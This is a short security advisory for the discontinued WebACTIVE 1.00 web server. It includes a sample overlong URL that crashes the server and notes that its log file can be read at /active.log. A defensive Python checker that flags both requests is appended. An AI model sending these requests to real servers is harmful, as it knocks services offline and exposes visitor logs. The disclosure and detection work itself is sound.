Vulnerability
Webactiv.exe

Affected
ITAfrica's WebACTIVE version 1.00

Description
Prizm found the following. He was looking for a small server to download recently, to show one of his friends something he had made; later he messed about with this little program a bit and noticed a DoS bug.

WEBactive HTTP Server 1.00 is an HTTP/1.00-compliant World Wide Web server daemon for Windows 95 or Windows NT, specifically designed for the SOHO (Small Office/Home Office) environment. It will operate on any TCP/IP connection to the Internet, whether via temporary dial-up or permanent leased-line connectivity.

The problem is a lack of bounds checking: when you request a path of 280 characters, Webactiv.exe simply shuts down.

Quick example:
http://somedomain/0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Also, by simply requesting /active.log you can view the web server log, because active.log is the default log file name and the file is written to the server's default directory, which is the directory the server serves.

Solution
Heh, this server was discontinued as far as I see... it is rather dated and doesn't support much. Seeing as it was last revised in 1996, contacting the vendor would be rather meaningless... Also, the fact that it is HTTP/1.00-compliant kind of hints it is no longer being updated.
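As an added defensive example (not part of the original advisory or of the WebACTIVE product), the following Python checks HTTP request lines for the two issues described above: a request path at or beyond the 280-character crash threshold, and any request for the default active.log log file. The threshold and the log file path come from the advisory; the request lines below are constructed samples, not captured traffic.

```python
import re
from typing import Dict, List

# Threshold from the advisory: a 280-character request path crashes Webactiv.exe.
MAX_SAFE_PATH_LEN = 280
# Default log file name from the advisory; it sits in the served default directory.
LOG_FILE_PATH = "/active.log"

# "METHOD SP path [SP HTTP/x.y]" - version is optional because HTTP/0.9 clients omit it.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<version>HTTP/\d\.\d+))?$")


def inspect_request_line(line: str) -> Dict[str, object]:
    """Classify one request line; 'reasons' is empty when nothing looks suspicious."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return {"path": None, "reasons": ["unparseable request line"]}
    path = m.group("path")
    reasons: List[str] = []
    if len(path) >= MAX_SAFE_PATH_LEN:
        reasons.append(f"path length {len(path)} >= {MAX_SAFE_PATH_LEN} (crash threshold)")
    # Strip any query string and compare case-insensitively: Windows file
    # names are case-insensitive, so /Active.log reaches the same file.
    bare = path.split("?", 1)[0]
    if bare.lower() == LOG_FILE_PATH:
        reasons.append("request for server log file")
    return {"path": path, "reasons": reasons}


def flag_requests(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the request lines that triggered at least one reason."""
    return [r for r in (inspect_request_line(line) for line in lines) if r["reasons"]]


# Constructed sample request lines (not real traffic).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /" + "0" * 280 + " HTTP/1.0",   # overlong path, as in the advisory
    "GET /Active.log HTTP/1.0",         # log file, different case
    "HEAD /active.log?x=1 HTTP/1.0",    # log file with a query string
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print(hit["path"][:40], hit["reasons"])
```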